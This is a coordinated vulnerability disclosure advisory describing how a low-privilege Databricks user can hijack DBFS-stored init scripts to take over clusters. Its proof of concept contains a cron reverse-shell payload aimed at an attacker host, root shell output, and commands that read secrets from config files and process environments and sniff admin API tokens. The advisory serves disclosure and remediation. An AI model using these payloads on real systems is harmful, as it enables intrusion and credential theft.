Authored by Florian Roth, Marius Bartholdy | Site sec-consult.com

The Databricks Platform as of 2023-01-26 suffered from a cluster isolation bypass vulnerability through insecure defaults and shared storage.

SEC Consult Vulnerability Lab Security Advisory < 20230502-0 >
=======================================================================
title: Bypassing cluster isolation through insecure defaults and
shared storage
product: Databricks Platform
vulnerable version: PaaS version as of 2023-01-26
fixed version: Current PaaS version
CVE number: -
impact: critical
homepage: https://www.databricks.com
found: 2023-01-20
by: Florian Roth (Atos)
Marius Bartholdy (SEC Office Berlin)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult.
SEC Consult is part of Eviden, an atos business
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Databricks Data Science & Engineering (sometimes called simply "Workspace")
is an analytics platform based on Apache Spark. It is integrated with Azure to
provide one-click setup, streamlined workflows, and an interactive workspace
that enables collaboration between data engineers, data scientists, and
machine learning engineers."

Source: https://learn.microsoft.com/en-us/azure/databricks/scenarios/what-is-azure-databricks-ws


Business recommendation:
------------------------
The vendor disabled legacy scripts and migrated cluster-scoped scripts from
DBFS to WSFS. Affected customers received migration instructions.

SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.

We have also written a blog post in collaboration with Elia Florio, Sr. Director
of Detection & Response at Databricks and Florian Roth and Marius Bartholdy,
security researchers with SEC Consult. It can be found here:
https://r.sec-consult.com/databr

Furthermore, a proof of concept demo video has been published here (Youtube):
https://r.sec-consult.com/dbyoutube


Databricks concepts:
--------------------
Concept 1: Databricks File System (DBFS):

"The Databricks File System (DBFS) is a distributed file system mounted into a
Databricks workspace and available on Databricks clusters. DBFS is an
abstraction on top of scalable object storage that maps Unix-like filesystem
calls to native cloud storage API calls."

Source: https://docs.databricks.com/dbfs/index.html

Therefore developers can easily handle files as if they were local to a compute
cluster although they actually reside in a cloud storage.

The recommended way to interact with the DBFS is from within a notebook by using
the Databricks Utilities (dbutils). The following command could be used to list
the content of a directory:
===============================================================================
display(dbutils.fs.ls("dbfs:/databricks/scripts"))
===============================================================================

For further information see: https://learn.microsoft.com/en-us/azure/databricks/dbfs/


Concept 2: Init Scripts:

Databricks uses a feature called "init script" to customize compute clusters.
They can be used to install dependencies or to configure advanced network
settings. These are shell scripts that run during the startup of each cluster.

There are different types of init scripts:

(I) Cluster-scoped init scripts only run on the specified cluster and have to be
setup by the cluster owner. Before using a cluster-scoped script it has to be
uploaded to the DBFS. In the cluster configuration it is then referenced by its
file path, e.g dbfs:/databricks/scripts/init-health-check.sh

(II) Global init scripts run on every cluster and have to be configured by an
administrative user. Their storage location is not disclosed.

(III) Legacy global init scripts are theoretically deprecated. However, they are
enabled by default, even on newly created workspaces. The main difference to
the newer global init scripts is that they are stored on the DBFS in a fixed
location at dbfs:/databricks/init.

For further information see: https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts


Vulnerability overview/description:
-----------------------------------
1) Bypassing cluster isolation through insecure defaults and shared storage

A low-privilege user is able to break the isolation between Databricks compute
clusters and take over any cluster in a workspace as long as they are allowed
to run notebooks. Due to an insecure default configuration combined with
insufficient access control, it is possible to gain remote code execution on all
clusters of a workspace. With such an access, it is possible to leak secrets and
to escalate privileges to those of a workspace administrator.


Attack scenario:
The DBFS is accessible by every user in a Databricks workspace. All files stored
here are visible to anyone in the workspace. Cluster-scoped and legacy global
init scripts are stored here.

An authenticated attacker with the lowest possible permissions in a Databricks
workspace could run a notebook to:

1. Find and modify an existing cluster-scoped init script.
2. Place a new script in the default location for legacy global init scripts.

Both attacks lead to the take over of the compute cluster resources and enable
further attacks. Firstly, any secrets stored can be read and, secondly,
workspace administrator tokens can be stolen as demonstrated by Joosua
Santasalo from Secureworks.

See: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html


Proof of concept:
-----------------
1) Bypassing cluster isolation through insecure defaults and shared storage
a) Preparations:

For this POC a new Azure Databricks workspace was created with the "premium"
pricing tier. It includes an administrative user (databricks-workspace-admin)
as well as a newly added low-privileged user (databricks-user) with the default
permissions "Workspace access" and "Databricks SQL access". These are the fewest
possible permissions a user can have.

To demonstrate both attack scenarios, three clusters were created:

1. Cluster on which the databricks-user has permissions to run notebooks
("Can attach to")
2. Cluster for the databricks-workspace-admin with a cluster-scoped init script
already configured.
3. Cluster for the databricks-workspace-admin with NO init script

The databricks-user does not have access to the clusters 2 and 3.
They cannot even see them in the portal.

For the cluster 2 (with a pre-configured init script) the following notebook
code was used by the databricks-workspace-admin to create an init script which
simply writes example output to /tmp/init-health-check-success.txt:

===============================================================================
dbutils.fs.mkdirs("dbfs:/databricks/scripts/")
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
echo 'Init health check: successful > /tmp/init-helth-check-success.txt' """, True)
display(dbutils.fs.ls("dbfs:/databricks/scripts/init-health-check.sh"))
===============================================================================

After that the script was applied to cluster 2 as a cluster-scoped init script.

To show the impact of this attack in a more tangible way a keyvault-backed
secret scope as well as a databricks-backed secret scope were also created.
Their secrets were then used in the spark configuration and in the environment
variables of cluster 2 and 3.

===============================================================================
Spark configuration:
databricks-backed-secret {{secrets/databricks-backed-secret-scope/databricks-backed-secret}}
azure-keyvault-backed-secret {{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret}}

Environment variables:
databricks_backed_secret_in_environment={{secrets/databricks-backed-secret-scope/databricks-backed-secret-in-environment}}
azure_keyvault_backed_secret_in_environment={{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}
===============================================================================

These serve only as examples. On a real productive compute cluster they could be used to
connect to additional cloud storage as described here:
https://learn.microsoft.com/en-us/azure/databricks/external-data/azure-storage#--access-azure-data-lake-storage-gen2-or-blob-storage-using-oauth-20-with-an-azure-service-principal


b) Attack via pre-existing init script:

The attacker starts by viewing the content of the DBFS with the following code:
===============================================================================
display(dbutils.fs.ls("dbfs:/databricks"))
display(dbutils.fs.ls("dbfs:/databricks/scripts"))
===============================================================================

All found .sh files could potentially be cluster-scoped init scripts applied to
clusters that the attacker is not aware of. It is not possible to overwrite
existing scripts, they can however be renamed or deleted. The cluster
configuration is only aware of the script names. Therefore, a newly created
script with the same name will be executed. Such a malicious file was created.
It includes a reverse shell that will continually attempt to connect to the
attacker's server.

===============================================================================
# rename file
dbutils.fs.mv("/databricks/scripts/init-health-check.sh",
"/databricks/scripts/init-health-check.sh.old")
#write new file with malicious content
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)
===============================================================================

As soon as the init script is triggered again, for example via a cluster restart,
a reverse shell connection, with root privileges on the compute cluster, is
received:

===============================================================================
user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 48518 received!
bash: cannot set terminal process group (21384): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-110521-h6l5h1n2-10-139-64-5:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-110521-h6l5h1n2-10-139-64-5:~# uname -a
uname -a
Linux 0121-110521-h6l5h1n2-10-139-64-5 5.4.0-1090-azure #95~18.04.1-Ubuntu SMP Sun Aug 14 20:09:27 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-110521-h6l5h1n2-10-139-64-5:~#
===============================================================================


c) Attack via legacy global init script:

The legacy global init script is enabled by default, therefore an attacker could
assume it is turned on and place a script in the default location at
dbfs:/databricks/init.

===============================================================================
dbutils.fs.mkdirs("dbfs:/databricks/init/")
dbutils.fs.put("dbfs:/databricks/init/global-init.sh"""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)
===============================================================================

Global init scripts apply to every existing compute cluster. Every cluster will
establish a reverse shell now as soon as the script is triggered again. With
this attack it is possible to attack compute clusters even if they do not have
a cluster-scoped init script set up.

===============================================================================
user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 53910 received!
bash: cannot set terminal process group (988): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-111747-cmijb28n-10-139-64-4:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-111747-cmijb28n-10-139-64-4:~# uname -a
uname -a
Linux 0121-111747-cmijb28n-10-139-64-4 5.4.0-1100-azure #106~18.04.1-Ubuntu SMP Mon Dec 12 21:49:35 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-111747-cmijb28n-10-139-64-4:~#
===============================================================================


Impact:

a) Leaking sensitive information in environment variables and the configuration:

Secrets configured in the keyvault-backed secret scope can only be retrieved at
runtime by the compute instance itself via a managed identity. Even Databricks
workspace administrators cannot read them directly. They are however available
to the compute cluster as soon as it is initialized. With remote code execution
and root privileges an attacker is able to read the plain text secrets of any
cluster.

Spark configuration secrets can be found at /tmp/custom-spark.conf:

===============================================================================
root@0121-111747-cmijb28n-10-139-64-4:/tmp# cat custom-spark.conf
cat custom-spark.conf
spark.databricks.unityCatalog.enforce.permissions false
spark.driver.host 10.139.64.6
spark.databricks.secret.envVar.keys.toRedact ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==
spark.driver.tempDirectory /local_disk0/tmp
spark.databricks.delta.preview.enabled true
spark.databricks.wsfsPublicPreview true
databricks-backed-secret databricks-backed-secret-value <- THIS IS A SECRET
spark.databricks.secret.sparkConf.keys.toRedact ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==
spark.databricks.mlflow.autologging.enabled true
spark.executor.tempDirectory /local_disk0/tmp
spark.databricks.enablePublicDbfsFuse false
spark.databricks.workspaceUrl adb-8690126810713062.2.azuredatabricks.net
spark.master local[*, 4]
azure-keyvault-backed-secret azure-keyvault-backed-secret-value <- THIS IS A SECRET
spark.databricks.cloudfetch.hasRegionSupport true
spark.databricks.unityCatalog.enabled true
spark.databricks.automl.serviceEnabled true
spark.databricks.cluster.profile singleNode
root@0121-111747-cmijb28n-10-139-64-4:/tmp#
===============================================================================

In order to read secrets in the environment variables, an attacker would need
to access the environment of the right process. With root privileges, they are
able to access all processes' environments by reading the corresponding
/proc/<process-id>/environ file. For simplicity however, the right process-id
(888) was used in this POC:

===============================================================================
root@0121-110521-h6l5h1n2-10-139-64-5:~# cat /proc/888/environ
SHELL=/bin/bash[...]
TERM=xterm-256color
USER=root
SPARK_PUBLIC_DNS=10.139.64.6
azure_keyvault_backed_secret_in_environment=
azure-keyvault-backed-secret-in-envionment-value <- THIS IS A SECRET
SPARK_LOCAL_DIRS=/local_disk0SHLVL=1
MASTER=local[4]
SPARK_HOME=/databricks/spark
SPARK_LOCAL_IP=10.139.64.6
MLFLOW_CONDA_HOME=/databricks/conda
CLASSPATH=/databricks/spark/dbconf/jets3t/:/databricks/spark/dbconf/log4j/driver:/databricks/hive/conf:/databricks/spark/dbconf/hadoop:/databricks/jars/*
SPARK_CONF_DIR=/databricks/spark/conf
SPARK_DIST_CLASSPATH=/databricks/spark/dbconf/log4j/driver:/databricks/jars/*
PYENV_ROOT=/databricks/.pyenv
DATABRICKS_LIBS_NFS_ROOT_PATH=/local_disk0/.ephemeral_nfs
SPARK_ENV_LOADED=1
DATABRICKS_CLUSTER_LIBS_ROOT_DIR=cluster_libraries
PATH=/databricks/.pyenv/bin:/usr/local/nvidia/bin:/databricks/python3/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
DATABRICKS_LIBS_NFS_ROOT_DIR=.ephemeral_nfsSUDO_UID=0
DATABRICKS_CLUSTER_LIBS_PYTHON_ROOT_DIR=python
SPARK_SCALA_VERSION=2.12
MAIL=/var/mail/root
databricks_backed_secret_in_environment=
database-backed-secret-in-environment-value <- THIS IS A SECRET
SCALA_VERSION=2.10PTY_LIB_FOLDER=/usr/lib/libptyOLDPWD=/databricks/chauffeurSPARK_WORKE
===============================================================================


b) API Token leak and privilege escalation:

Using a vulnerability initially found by Joosua Santasalo from Secureworks it is
possible to leak Databricks API tokens of other users, including administrators.
The previously proposed hardening technique "Use cluster types that support user
isolation wherever possible." does not mitigate the initial vulnerability as
all compute cluster types are affected by our new vulnerability.
Source: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html

It is thereby possible to impersonate any user and to gain privileges of a
workspace administrator.

Using the previously established reverse-shell it is possible to capture
control-plane traffic with the following command. As soon as a task is started
with the administrative user, for example running a simple notebook, the token
is sent unencrypted and could be leaked.

(Make sure to verify that you are on the correct cluster when reproducing the
issue using the global init script attack vector since the user cluster will
also be attacked and send a shell too. This confused us more often than we
would like to admit.)

===============================================================================
root@0121-110521-h6l5h1n2-10-139-64-5:~# /usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
/usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked v1), capture size 262144 bytes
{"apiToken":"dkea****************************a107","procStartTime":53444,"commandOrigin":"PythonDriver","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/[email protected]"}
apiToken
{"apiToken":"dkea****************************a107","procStartTime":85732,"commandOrigin":"PythonWorker","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-
. . .
===============================================================================

This apiToken could then be used in the Databricks CLI or with the REST API
directly. The following example request needed administrative privileges to
succeed:

===============================================================================
└─$ curl -s https://adb-redacted.2.azuredatabricks.net/api/2.0/secrets/scopes/list -H 'Authorization: Bearer dkea****************************a107' | jq
{
"scopes": [
{
"name": "databricks-backed-secret-scope",
"backend_type": "DATABRICKS"
},
{
"name": "key-vault-backed-secret-scope",
"backend_type": "AZURE_KEYVAULT",
"keyvault_metadata": {
"resource_id": "/subscriptions/714984c7-3ed0-4de2-b23b-9cffd28b74f7/resourceGroups/rg-databricks-proof-of-concept/providers/Microsoft.KeyVault/vaults/redacted-databricks-poc",
"dns_name": "https://redacted-databricks-poc.vault.azure.net/"
}
}
]
}
===============================================================================

Additional scenarios are possible once RCE is achieved, for example by using the
managed identity of the compute clusters to get an access token via the instance
metadata service at http://169.254.169.254/metadata/identity/oauth2/token.


Vulnerable / tested versions:
-----------------------------
The latest Databricks PaaS offering was tested on Azure as well as Amazon Web
Services (AWS) with the "Premium" pricing tier as of 2023-01-26.


Vendor contact timeline:
------------------------
2023-01-26: Contacting vendor PGP-encrypted through [email protected]
2023-01-26: Vendor acknowledged the email and is reviewing the reports
2023-02-15: Vendor confirms all vulnerabilities and is working on a solution
2023-03-29: Vendor proposes a solution
2023-05-02: Coordinated release of security advisory


Solution:
---------
Databricks disabled the creation of new workspaces using the deprecated init
script types and added support for initializing scripts in Workspace Files.

The following solution for end users has been provided by the vendor:

Legacy global init scripts:

* Immediately disable legacy global init scripts (AWS [1] | Azure [2] ) if not actively
used: it's a safe, easy, and immediate step to close this potential attack vector.

* Customers with legacy global init scripts deployed should first migrate legacy
scripts to the new global init script type (this notebook [3] can be used to automate
the migration work) and, after this migration step, proceed to disable the legacy
version as indicated in the previous step.

[1] https://docs.databricks.com/clusters/init-scripts.html#migrate-legacy-scripts
[2] https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts#migrate-legacy-scripts
[3] https://kb.databricks.com/legacy-global-init-script-migration-notebook


Cluster-named init scripts:

* Cluster-named init scripts are similarly affected by the issue and are also deprecated:
customers still using this type of init scripts should migrate them to cluster-scoped
scripts and make sure that the scripts are stored in the new workspace files storage
location (AWS [4] | Azure [5] | GCP [6]). This notebook [7] can be used to automate the migration work.


Cluster-scoped init scripts:

* Existing cluster-scoped init scripts stored on DBFS should be migrated to the alternative,
safer workspace files location (AWS [4] | Azure [5] | GCP [6] ). Going forward the default location of
cluster-scoped init scripts in the product UI will be workspace files.

[4] https://docs.databricks.com/files/workspace.html
[5] https://learn.microsoft.com/en-us/azure/databricks/files/workspace
[6] https://docs.gcp.databricks.com/files/workspace.html
[7] https://kb.databricks.com/cluster-named-init-script-migration-notebook


Legacy global init scripts and cluster-named init scripts will be disabled for all workspaces
on Sept 1, 2023. They will not function after this date.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an atos business
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part
of Eviden, an atos business. It ensures the continued knowledge gain of SEC
Consult in the field of network and application security to stay ahead of the
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration
testing and the evaluation of new offensive and defensive technologies for our
customers. Hence our customers obtain the most current information about
vulnerabilities and valid recommendation about the risk profile of new
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Florian Roth, Marius Bartholdy / @2023